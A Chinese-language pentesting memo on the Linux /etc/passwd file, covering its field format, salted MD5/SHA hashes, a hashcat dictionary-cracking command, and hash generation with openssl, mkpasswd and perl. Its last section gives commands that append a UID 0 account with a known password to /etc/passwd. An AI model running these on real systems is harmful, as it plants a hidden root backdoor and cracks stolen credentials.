passwd文件备忘录

0x000 passwd文件介绍

---

passwd文件格式

root:x:0:0:root:/root:/bin/bash

第一位，登录用户名
第二位，密码
第三位，用户身份编号
第四位，组编号
第五位，用户命名或注释
第六位，用户主目录
第七位，用户默认使用 shell

密码类型：https://hashcat.net/hashcat/

#MD5
$1$KyF5u4ME$VnwrCGapyoxt3q8MFkPQ51

#SHA256
$5$hacker$J7FS24F1fBrY3bxviBKhORt8QASCu7SHrcHaGWwTp2B

#SHA512
$6$hacker$3PdGTmd2zpCW9FPP4oijQ4L1T1hJ8EeuOrfePv3gyWH9AHotrnolcDp5oos5.bbPbstABbt3F5hSbCX86vwbG1

hashcat
hashcat --force -a 0 -m 1800 hash.txt ./password.txt

相关破解工具
john、hashcat、cmd5

---

0x001 3中密码生成方式

---

openssl

options:
-1    MD5
-5    SHA256
-6    SHA512

openssl passwd -6 -salt [盐] [密码]

mkpasswd

options
--method    支持MD5、SHA-256、SHA-512

mkpasswd --method=SHA-512 --stdin

perl

perl就说这一种生成密码方式，其他密码生成要安装对应的加密类型模块。

perl -le 'print crypt("123456","addedsalt")'

# 以下两种方式没试成功，安装模块出错。
# sha256
cpan Crypt::Digest::SHA256
perl -MCrypt::Digest::SHA256 -E 'say Crypt::Digest::SHA256::sha256_hex("your_password")'

# sha512
cpan Crypt::Passwd::XS
perl -MCrypt::Passwd::XS -E 'say unix_sha512_crypt("your_password", "your_salt")'

---

0x002 密码生成

---

perl -le 'print crypt("123456","addedsalt")'
echo "hack:adrla7IBSfTZQ:0:0:hack:/root:/bin/bash" >> passwd

生成MD5密码

openssl passwd -1 -salt hacker 123456
echo "hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:hacker:/root:/bin/bash" >> /etc/passwd

生成SHA256密码

openssl passwd -5 -salt hacker 123456
$5$hacker$J7FS24F1fBrY3bxviBKhORt8QASCu7SHrcHaGWwTp2B

生成SHA512密码

openssl passwd -6 -salt hacker 123456
$6$hacker$3PdGTmd2zpCW9FPP4oijQ4L1T1hJ8EeuOrfePv3gyWH9AHotrnolcDp5oos5.bbPbstABbt3F5hSbCX86vwbG1